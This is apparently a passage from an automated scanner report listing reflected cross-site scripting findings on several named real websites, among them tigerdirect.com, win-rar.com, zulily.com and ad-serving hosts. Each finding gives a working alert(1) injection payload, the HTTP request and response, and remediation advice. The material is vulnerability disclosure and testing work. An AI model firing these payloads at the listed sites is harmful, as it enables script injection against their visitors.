The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bbb57'-alert(1)-'a41769cc3f6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 858a5'-alert(1)-'825233dafa2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
1.428. http://www.rightnow.com/mobile.css [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.rightnow.com
Path:
/mobile.css
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f1104'-alert(1)-'531515845 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8a583'-alert(1)-'4b76b1ad986 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
1.430. http://www.rightnow.com/rightnow_secondary.css [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.rightnow.com
Path:
/rightnow_secondary.css
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 30c8e'-alert(1)-'60cc89cbe95 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f8f17'-alert(1)-'bf6b026719f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
1.432. http://www.rightnow.com/search/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.rightnow.com
Path:
/search/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4626d'-alert(1)-'8e38a3c5ccd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the q request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ff99"><script>alert(1)</script>6ad8c47ae16 was submitted in the q parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the q request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ae9c6"%3balert(1)//5a9f32949ac was submitted in the q parameter. This input was echoed as ae9c6";alert(1)//5a9f32949ac in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload db774"style%3d"x%3aexpression(alert(1))"bad281a382 was submitted in the url parameter. This input was echoed as db774"style="x:expression(alert(1))"bad281a382 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /ext/soc/x?url=db774"style%3d"x%3aexpression(alert(1))"bad281a382&text=Kts%2daf%2enet%20is%20delegated%20to%20four%20domain%20name%20servers%2c%20however%20one%20extra%20name%20server%20is%20listed%20in%20the%2e%2e%2e HTTP/1.1 Host: www.robtex.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: http://www.robtex.com/dns/kts-af.net.html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Content-Type: text/html ETag: c7c7aa7fa14334cde9a382a5f8428f47.gzip Last-Modified: Wed, 28 Sep 2011 02:53:03 GMT X-Debug: z0,fat0.x.robtex.com Vary: Accept-Encoding X-E-Original-Length: 1572 X-G-New-Length: 813 X-Rt: p24088 f3801 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" PICS-Label: (pics-1.1 "http://www.icra.org/pics/vocabularyv03/" l r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0) "http://www.rsac.org/ratingsv01.html" l r (n 0 s 0 v 0 l 0)) Server: lighttpd/1.4.19 X-Cache: MISS from fat0x.x.robtex.com X-Cache-Lookup: MISS from fat0x.x.robtex.com:80 Via: 1.1 fat0x.x.robtex.com:80 (squid/2.7.STABLE3) Content-Length: 1572 Date: Wed, 28 Sep 2011 02:53:03 GMT X-Varnish: 533750498 Age: 0 Via: 1.1 varnish Connection: keep-alive
The value of the crypt request parameter is copied into the HTML document as plain text between tags. The payload 6a126<script>alert(1)</script>6682e1a2063 was submitted in the crypt parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the dk request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e4fc2'%3balert(1)//9556241b89c was submitted in the dk parameter. This input was echoed as e4fc2';alert(1)//9556241b89c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the nightnum request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload edd60'%3balert(1)//6933e5ef7f9 was submitted in the nightnum parameter. This input was echoed as edd60';alert(1)//6933e5ef7f9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the nip request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1d8d5'%3balert(1)//49b5d938456 was submitted in the nip parameter. This input was echoed as 1d8d5';alert(1)//49b5d938456 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the propid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2df56'%3balert(1)//0acb8136b5a was submitted in the propid parameter. This input was echoed as 2df56';alert(1)//0acb8136b5a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the rd request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6224b'%3balert(1)//5623fd652af was submitted in the rd parameter. This input was echoed as 6224b';alert(1)//5623fd652af in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the rddate request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9e40d'%3balert(1)//5af1c17b28d was submitted in the rddate parameter. This input was echoed as 9e40d';alert(1)//5af1c17b28d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the wrnum request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 45ea5'%3balert(1)//fab14a269ae was submitted in the wrnum parameter. This input was echoed as 45ea5';alert(1)//fab14a269ae in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the keywords request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c052"%20a%3db%2068ba09a4013 was submitted in the keywords parameter. This input was echoed as 5c052" a=b 68ba09a4013 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /applications/SearchTools/search.asp?keywords=MSKEY5c052"%20a%3db%2068ba09a4013 HTTP/1.1 Host: www.tigerdirect.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the keywords request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1af10"%3balert(1)//e953487a67c was submitted in the keywords parameter. This input was echoed as 1af10";alert(1)//e953487a67c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /applications/SearchTools/search.asp?keywords=MSKEY1af10"%3balert(1)//e953487a67c HTTP/1.1 Host: www.tigerdirect.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<html> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <meta name="description" content="TigerDirect.com is your complete online headquarters for computer products ...[SNIP]... <script language="Javascript"> function callbutton() { var rs = "100200853.305725085"; var ud = "MSKEY1af10";alert(1)//e953487a67c"; var dt = new Date(); var tz = dt.getTimezoneOffset();
var sk = "eK3sVp9kJhCSx84kXas2Fka8skJCs3d02jdVAzpO23aKnFj23sk8UhGbbF3ksM4L"; var url = "http://tg6006.callbutton.net/bin/popup.cfm?sk= ...[SNIP]...
The value of the keywords request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 45e12'%3b6fcf19a131 was submitted in the keywords parameter. This input was echoed as 45e12';6fcf19a131 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /applications/SearchTools/search.asp?keywords=MSKEY45e12'%3b6fcf19a131 HTTP/1.1 Host: www.tigerdirect.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.447. http://www.tigerdirect.com/applications/SearchTools/search.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.tigerdirect.com
Path:
/applications/SearchTools/search.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eedf6'%3balert(1)//256935e2024 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as eedf6';alert(1)//256935e2024 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /applications/SearchTools/search.asp?keywords=MSKEY&eedf6'%3balert(1)//256935e2024=1 HTTP/1.1 Host: www.tigerdirect.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the srkey request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 98fed'%3balert(1)//5682d04a4e0 was submitted in the srkey parameter. This input was echoed as 98fed';alert(1)//5682d04a4e0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /go/windows-7/?srkey=windows98fed'%3balert(1)//5682d04a4e0 HTTP/1.1 Host: www.tigerdirect.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.449. http://www.voanews.com/english/news/middle-east/Analysts-Question-Merit-of-Palestinian-UN-Bid--130650528.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e293a"><script>alert(1)</script>b746f85ab2f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /english/news/middle-east/Analysts-Question-Merit-of-Palestinian-UN-Bid--130650528.html?e293a"><script>alert(1)</script>b746f85ab2f=1 HTTP/1.1 Host: www.voanews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the dl request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 864b6"><script>alert(1)</script>74fbd2b6f55 was submitted in the dl parameter. This input was echoed as 864b6\"><script>alert(1)</script>74fbd2b6f55 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www. ...[SNIP]... <a id="downloadlink" href="index.php?id=postdownload&dl=/rar/wrar401.exe864b6\"><script>alert(1)</script>74fbd2b6f55"> ...[SNIP]...
1.451. http://www.win-rar.com/index.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.win-rar.com
Path:
/index.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44b15"><script>alert(1)</script>60364650746 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 44b15\"><script>alert(1)</script>60364650746 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www. ...[SNIP]... <a id="downloadlink" href="index.php?id=postdownload&dl=/rar/wrar401/44b15\"><script>alert(1)</script>60364650746.exe"> ...[SNIP]...
1.452. https://www.zulily.com/index.php/customer/account/create/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
https://www.zulily.com
Path:
/index.php/customer/account/create/
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 7bf89--><script>alert(1)</script>39129dcf067 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /index.php/customer/account/create/?7bf89--><script>alert(1)</script>39129dcf067=1 HTTP/1.1 Host: www.zulily.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: frontend=t37t9tbsags6oa45ga0pge1hs1
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a6a75"-alert(1)-"f36fff604b2 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /rjsi/dc/10449/145817/adi/N5823.InterCLICK/B5763012.5;sz=728x90;click=http://a1.interclick.com/icaid/188574/tid/b50df682-3af4-40bc-830e-667d90bcd4c5/click.ic?;ord=634486847201680898? HTTP/1.1 Host: fw.adsafeprotected.com Proxy-Connection: keep-alive Referer: http://www.google.com/search?hl=en&q=a6a75"-alert(1)-"f36fff604b2 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=25D78024A8C0896A610C036D53493825; Path=/ Content-Type: text/html Date: Thu, 11 Aug 2011 22:40:33 GMT Connection: close
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ee0e0"-alert(1)-"af928c507e5 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /rjss/choices.truste.com/10449/9003/ca?pid=hp01&aid=hp02&cid=68442935&c=cachebuster&w=728&h=90&plc=tl&js=10 HTTP/1.1 Host: fw.adsafeprotected.com Proxy-Connection: keep-alive Referer: http://www.google.com/search?hl=en&q=ee0e0"-alert(1)-"af928c507e5 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=4DC99CCBFDEA5ECA450887DEC1D88A4C; Path=/ Content-Type: text/javascript Date: Thu, 11 Aug 2011 22:40:32 GMT Connection: close
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 841d1"-alert(1)-"c8a6010a068 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /jspix?anId=144&pubId=23374&campId=168344 HTTP/1.1 Host: pixel.adsafeprotected.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.google.com/search?hl=en&q=841d1"-alert(1)-"c8a6010a068
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=BE8D7611C536C5E16DE3C5D64FE397BB; Path=/ Content-Type: text/javascript Date: Tue, 27 Sep 2011 22:13:22 GMT Connection: close
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 9beb5><a>78f40869281 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /applications/SearchTools/search.asp HTTP/1.1 Host: www.tigerdirect.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=9beb5><a>78f40869281
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 6e3c5><a>0d3fc7a661c was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /applications/SearchTools/search.asp?keywords=MSKEY HTTP/1.1 Host: www.tigerdirect.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=6e3c5><a>0d3fc7a661c
The value of the Referer HTTP header is copied into an HTML comment. The payload 93492--><script>alert(1)</script>78dc5ad6ccd was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
The value of the cli cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 79968'%3balert(1)//1e149ae6a1 was submitted in the cli cookie. This input was echoed as 79968';alert(1)//1e149ae6a1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Wed, 31 Aug 2011 17:54:45 GMT Content-Type: application/x-javascript Connection: close P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Length: 7671
var cid='12244bc34a8b1dc79968';alert(1)//1e149ae6a1';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this ...[SNIP]...
The value of the cli cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5f126'%3balert(1)//a85117f8d1c was submitted in the cli cookie. This input was echoed as 5f126';alert(1)//a85117f8d1c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Thu, 11 Aug 2011 22:42:41 GMT Content-Type: application/x-javascript Connection: close P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Set-Cookie: exdp=1; domain=collective-media.net; path=/; expires=Thu, 18-Aug-2011 22:42:41 GMT Set-Cookie: ibvr=1; domain=collective-media.net; path=/; expires=Thu, 18-Aug-2011 22:42:41 GMT Set-Cookie: targ=1; domain=collective-media.net; path=/; expires=Thu, 18-Aug-2011 22:42:41 GMT Set-Cookie: brlg=1; domain=collective-media.net; path=/; expires=Thu, 18-Aug-2011 22:42:41 GMT Content-Length: 7740
var cid='1214cf76b201e605f126';alert(1)//a85117f8d1c';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this ...[SNIP]...
Report generated by XSS.CX at Wed Oct 05 10:34:16 CDT 2011.